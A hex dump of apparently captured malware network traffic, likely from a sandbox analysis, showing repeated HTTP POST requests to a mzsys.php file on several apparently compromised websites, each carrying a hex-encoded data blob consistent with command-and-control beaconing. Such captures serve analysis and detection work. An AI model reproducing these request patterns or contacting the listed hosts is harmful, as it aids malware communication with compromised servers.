0x000002c0 (00704)   38343635 31393444 37363833 32434331   8465194D76832CC1
0x000002d0 (00720)   31344246 36423934 36303736 43423037   14BF6B946076CB07
0x000002e0 (00736)   31374436 45314632 45453633 31433537   17D6E1F2EE631C57
0x000002f0 (00752)   35343946 36303831 44304338 37333830   549F6081D0C87380
0x00000300 (00768)   43363041 35453541 45424438 41323933   C60A5E5AEBD8A293
0x00000310 (00784)   33373932 34443841 33464131 41454133   37924D8A3FA1AEA3
0x00000320 (00800)   36313239 35344144 34463245 37313243   612954AD4F2E712C
0x00000330 (00816)   44394141 37453730 43333831 45354442   D9AA7E70C381E5DB
0x00000340 (00832)   33384638 43333830 31303744 32313430   38F8C380107D2140
0x00000350 (00848)   35324634 30344431 38453530 41383932   52F404D18E50A892
0x00000360 (00864)   43393136 46303744 34334234 41393139   C916F07D43B4A919
0x00000370 (00880)   33303145 35313834 37333738 43454545   301E51847378CEEE
0x00000380 (00896)   37373032 42323942 30324530 43304542   7702B29B02E0C0EB
0x00000390 (00912)   34303334 42454338 36414630 33324443   4034BEC86AF032DC
0x000003a0 (00928)   43453846 41384641 34463444 38384345   CE8FA8FA4F4D88CE
0x000003b0 (00944)   46394631 33353343 30383441 30383441   F9F1353C084A084A
0x000003c0 (00960)   500dc8                                P..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000030 (00048)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000060 (00096)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000070 (00112)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000080 (00128)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x00000090 (00144)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000a0 (00160)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000b0 (00176)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000c0 (00192)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000d0 (00208)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000e0 (00224)   486f7374 3a206368 6f6e6275 7269636f   Host: chonburico
0x000000f0 (00240)   6f702e6e 65740d0a 436f6e74 656e742d   op.net..Content-
0x00000100 (00256)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000110 (00272)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000120 (00288)   61636865 0d0a0d0a 64617461 3d393434   ache....data=944
0x00000130 (00304)   38443845 38444441 39424343 30354236   8D8E8DDA9BCC05B6
0x00000140 (00320)   45443345 33383543 32343638 35343138   ED3E385C24685418
0x00000150 (00336)   39303231 46393246 32384542 32313638   9021F92F28EB2168
0x00000160 (00352)   44364632 30323536 38344338 41434432   D6F2025684C8ACD2
0x00000170 (00368)   42363136 41374335 43463939 37434344   B616A7C5CF997CCD
0x00000180 (00384)   33463138 33434542 37314541 34353138   3F183CEB71EA4518
0x00000190 (00400)   34354136 33323530 34304337 33314335   45A6325040C731C5
0x000001a0 (00416)   38313242 30313039 38463735 42454637   812B01098F75BEF7
0x000001b0 (00432)   39463737 34343530 33423339 46444341   9F7744503B39FDCA
0x000001c0 (00448)   31434346 46334443 34383436 35364442   1CCFF3DC484656DB
0x000001d0 (00464)   44353431 34384344 33333046 41414436   D54148CD330FAAD6
0x000001e0 (00480)   31433044 45393538 37353037 38443945   1C0DE95875078D9E
0x000001f0 (00496)   46333734 45384231 45324344 30323346   F374E8B1E2CD023F
0x00000200 (00512)   30384342 34323234 31414437 38303533   08CB42241AD78053
0x00000210 (00528)   44384636 32423236 32454239 42334239   D8F62B262EB9B3B9
0x00000220 (00544)   31394437 38333736 35453039 46464633   19D783765E09FFF3
0x00000230 (00560)   46313233 45354444 37463942 38333833   F123E5DD7F9B8383
0x00000240 (00576)   39313243 43324630 46423545 43414246   912CC2F0FB5ECABF
0x00000250 (00592)   34364133 42354633 32324133 37444231   46A3B5F322A37DB1
0x00000260 (00608)   37343832 32363233 42363239 41433034   74822623B629AC04
0x00000270 (00624)   39444133 30384443 34324333 42453945   9DA308DC42C3BE9E
0x00000280 (00640)   36324441 44383138 37413535 34364244   62DAD8187A5546BD
0x00000290 (00656)   45303239 30303936 42313034 36423944   E0290096B1046B9D
0x000002a0 (00672)   42434336 31424634 44383041 44343435   BCC61BF4D80AD445
0x000002b0 (00688)   30383436 35313934 44373638 33324343   08465194D76832CC
0x000002c0 (00704)   31313442 46364239 34363037 36434230   114BF6B946076CB0
0x000002d0 (00720)   37313744 36453146 32454536 33314335   717D6E1F2EE631C5
0x000002e0 (00736)   37353439 46363038 31443043 38373338   7549F6081D0C8738
0x000002f0 (00752)   30433630 41354535 41454244 38413239   0C60A5E5AEBD8A29
0x00000300 (00768)   33333739 32344438 41334641 31414541   337924D8A3FA1AEA
0x00000310 (00784)   33363132 39353441 44344632 45373132   3612954AD4F2E712
0x00000320 (00800)   43443941 41374537 30433338 31453544   CD9AA7E70C381E5D
0x00000330 (00816)   42333846 38433338 30313037 44323134   B38F8C380107D214
0x00000340 (00832)   30353246 34303444 31384535 30413839   052F404D18E50A89
0x00000350 (00848)   32433931 36463037 44343342 34413931   2C916F07D43B4A91
0x00000360 (00864)   39333031 45353138 34373337 38434545   9301E51847378CEE
0x00000370 (00880)   45373730 32423239 42303245 30433045   E7702B29B02E0C0E
0x00000380 (00896)   42343033 34424543 38364146 30333244   B4034BEC86AF032D
0x00000390 (00912)   43434538 46413846 41344634 44383843   CCE8FA8FA4F4D88C
0x000003a0 (00928)   45463946 31333533 43303834 41384345   EF9F1353C084A8CE
0x000003b0 (00944)   46394631 33353343 30383441 30383441   F9F1353C084A084A
0x000003c0 (00960)   500dc8                                P..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202c 202c202c 202c202c 202c202c   t: , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000080 (00128)   200d0a43 6f6e7465 6e742d54 7970653a    ..Content-Type:
0x00000090 (00144)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x000000a0 (00160)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x000000b0 (00176)   65640d0a 55736572 2d416765 6e743a20   ed..User-Agent: 
0x000000c0 (00192)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x000000d0 (00208)   646f7773 204e5420 362e333b 20574f57   dows NT 6.3; WOW
0x000000e0 (00224)   36343b20 54726964 656e742f 372e303b   64; Trident/7.0;
0x000000f0 (00240)   20546f75 63683b20 72763a31 312e3029    Touch; rv:11.0)
0x00000100 (00256)   206c696b 65204765 636b6f0d 0a486f73    like Gecko..Hos
0x00000110 (00272)   743a2070 6173736c 6966742e 636f6d0d   t: passlift.com.
0x00000120 (00288)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000130 (00304)   20363435 0d0a4361 6368652d 436f6e74    645..Cache-Cont
0x00000140 (00320)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000150 (00336)   0a646174 613d3934 34384438 45384444   .data=9448D8E8DD
0x00000160 (00352)   41394243 43303542 36454433 45333835   A9BCC05B6ED3E385
0x00000170 (00368)   43323436 38353431 38393032 31463932   C246854189021F92
0x00000180 (00384)   46323845 42323136 38443646 32303235   F28EB2168D6F2025
0x00000190 (00400)   36383443 38414344 32423631 36413743   684C8ACD2B616A7C
0x000001a0 (00416)   35434639 39374343 44334631 38334345   5CF997CCD3F183CE
0x000001b0 (00432)   42373145 41343531 38343541 36333235   B71EA451845A6325
0x000001c0 (00448)   30343043 37333143 35383132 42303130   040C731C5812B010
0x000001d0 (00464)   39384637 35424546 37394637 37343435   98F75BEF79F77445
0x000001e0 (00480)   30334233 39464443 41314343 46463344   03B39FDCA1CCFF3D
0x000001f0 (00496)   43343834 36353644 42443534 31343843   C484656DBD54148C
0x00000200 (00512)   44333330 46414144 36314330 44453935   D330FAAD61C0DE95
0x00000210 (00528)   38373530 37384439 45463337 34453842   875078D9EF374E8B
0x00000220 (00544)   31453243 44303233 46303843 42343232   1E2CD023F08CB422
0x00000230 (00560)   34314144 37383035 33443846 36324232   41AD78053D8F62B2
0x00000240 (00576)   36324542 39423342 39313944 37383337   62EB9B3B919D7837
0x00000250 (00592)   36354530 39464646 33463132 33453544   65E09FFF3F123E5D
0x00000260 (00608)   44374639 42383338 33393132 43433246   D7F9B8383912CC2F
0x00000270 (00624)   30464235 45434142 46343641 33423546   0FB5ECABF46A3B5F
0x00000280 (00640)   33323241 33374442 31373438 32323632   322A37DB17482262
0x00000290 (00656)   33423632 39414330 34394441 33303844   3B629AC049DA308D
0x000002a0 (00672)   43343243 33424539 45363244 41443831   C42C3BE9E62DAD81
0x000002b0 (00688)   38374135 35343642 44453032 39303039   87A5546BDE029009
0x000002c0 (00704)   36423130 34364239 44424343 36314246   6B1046B9DBCC61BF
0x000002d0 (00720)   34443830 41443434 35303834 36353139   4D80AD4450846519
0x000002e0 (00736)   34443736 38333243 43313134 42463642   4D76832CC114BF6B
0x000002f0 (00752)   39343630 37364342 30373137 44364531   946076CB0717D6E1
0x00000300 (00768)   46324545 36333143 35373534 39463630   F2EE631C57549F60
0x00000310 (00784)   38314430 43383733 38304336 30413545   81D0C87380C60A5E
0x00000320 (00800)   35414542 44384132 39333337 39323444   5AEBD8A29337924D
0x00000330 (00816)   38413346 41314145 41333631 32393534   8A3FA1AEA3612954
0x00000340 (00832)   41443446 32453731 32434439 41413745   AD4F2E712CD9AA7E
0x00000350 (00848)   37304333 38314535 44423338 46384333   70C381E5DB38F8C3
0x00000360 (00864)   38303130 37443231 34303532 46343034   80107D214052F404
0x00000370 (00880)   44313845 35304138 39324339 31364630   D18E50A892C916F0
0x00000380 (00896)   37443433 42344139 31393330 31453531   7D43B4A919301E51
0x00000390 (00912)   38343733 37384345 45453737 30324232   847378CEEE7702B2
0x000003a0 (00928)   39423032 45304330 45423430 33344245   9B02E0C0EB4034BE
0x000003b0 (00944)   43383641 46303332 44434345 38464138   C86AF032DCCE8FA8
0x000003c0 (00960)   46413446 34443838 43454639 46313335   FA4F4D88CEF9F135
0x000003d0 (00976)   33433038 3441                         3C084A

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000060 (00096)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000070 (00112)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000080 (00128)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000090 (00144)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000a0 (00160)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000b0 (00176)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000c0 (00192)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000d0 (00208)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000e0 (00224)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000f0 (00240)   486f7374 3a206163 74696f6e 706f7572   Host: actionpour
0x00000100 (00256)   69737261 656c2e63 6f6d0d0a 436f6e74   israel.com..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d393434 38443845 38444441 39424343   =9448D8E8DDA9BCC
0x00000150 (00336)   30354236 45443345 33383543 32343638   05B6ED3E385C2468
0x00000160 (00352)   35343138 39303231 46393246 32384542   54189021F92F28EB
0x00000170 (00368)   32313638 44364632 30323536 38344338   2168D6F2025684C8
0x00000180 (00384)   41434432 42363136 41374335 43463939   ACD2B616A7C5CF99
0x00000190 (00400)   37434344 33463138 33434542 37314541   7CCD3F183CEB71EA
0x000001a0 (00416)   34353138 34354136 33323530 34304337   451845A6325040C7
0x000001b0 (00432)   33314335 38313242 30313039 38463735   31C5812B01098F75
0x000001c0 (00448)   42454637 39463737 34343530 33423339   BEF79F7744503B39
0x000001d0 (00464)   46444341 31434346 46334443 34383436   FDCA1CCFF3DC4846
0x000001e0 (00480)   35364442 44353431 34384344 33333046   56DBD54148CD330F
0x000001f0 (00496)   41414436 31433044 45393538 37353037   AAD61C0DE9587507
0x00000200 (00512)   38443945 46333734 45384231 45324344   8D9EF374E8B1E2CD
0x00000210 (00528)   30323346 30384342 34323234 31414437   023F08CB42241AD7
0x00000220 (00544)   38303533 44384636 32423236 32454239   8053D8F62B262EB9
0x00000230 (00560)   42334239 31394437 38333736 35453039   B3B919D783765E09
0x00000240 (00576)   46464633 46313233 45354444 37463942   FFF3F123E5DD7F9B
0x00000250 (00592)   38333833 39313243 43324630 46423545   8383912CC2F0FB5E
0x00000260 (00608)   43414246 34364133 42354633 32324133   CABF46A3B5F322A3
0x00000270 (00624)   37444231 37343832 32363233 42363239   7DB174822623B629
0x00000280 (00640)   41433034 39444133 30384443 34324333   AC049DA308DC42C3
0x00000290 (00656)   42453945 36324441 44383138 37413535   BE9E62DAD8187A55
0x000002a0 (00672)   34364244 45303239 30303936 42313034   46BDE0290096B104
0x000002b0 (00688)   36423944 42434336 31424634 44383041   6B9DBCC61BF4D80A
0x000002c0 (00704)   44343435 30383436 35313934 44373638   D44508465194D768
0x000002d0 (00720)   33324343 31313442 46364239 34363037   32CC114BF6B94607
0x000002e0 (00736)   36434230 37313744 36453146 32454536   6CB0717D6E1F2EE6
0x000002f0 (00752)   33314335 37353439 46363038 31443043   31C57549F6081D0C
0x00000300 (00768)   38373338 30433630 41354535 41454244   87380C60A5E5AEBD
0x00000310 (00784)   38413239 33333739 32344438 41334641   8A29337924D8A3FA
0x00000320 (00800)   31414541 33363132 39353441 44344632   1AEA3612954AD4F2
0x00000330 (00816)   45373132 43443941 41374537 30433338   E712CD9AA7E70C38
0x00000340 (00832)   31453544 42333846 38433338 30313037   1E5DB38F8C380107
0x00000350 (00848)   44323134 30353246 34303444 31384535   D214052F404D18E5
0x00000360 (00864)   30413839 32433931 36463037 44343342   0A892C916F07D43B
0x00000370 (00880)   34413931 39333031 45353138 34373337   4A919301E5184737
0x00000380 (00896)   38434545 45373730 32423239 42303245   8CEEE7702B29B02E
0x00000390 (00912)   30433045 42343033 34424543 38364146   0C0EB4034BEC86AF
0x000003a0 (00928)   30333244 43434538 46413846 41344634   032DCCE8FA8FA4F4
0x000003b0 (00944)   44383843 45463946 31333533 43303834   D88CEF9F1353C084
0x000003c0 (00960)   41413446 34443838 43454639 46313335   AA4F4D88CEF9F135
0x000003d0 (00976)   33433038 3441                         3C084A


Strings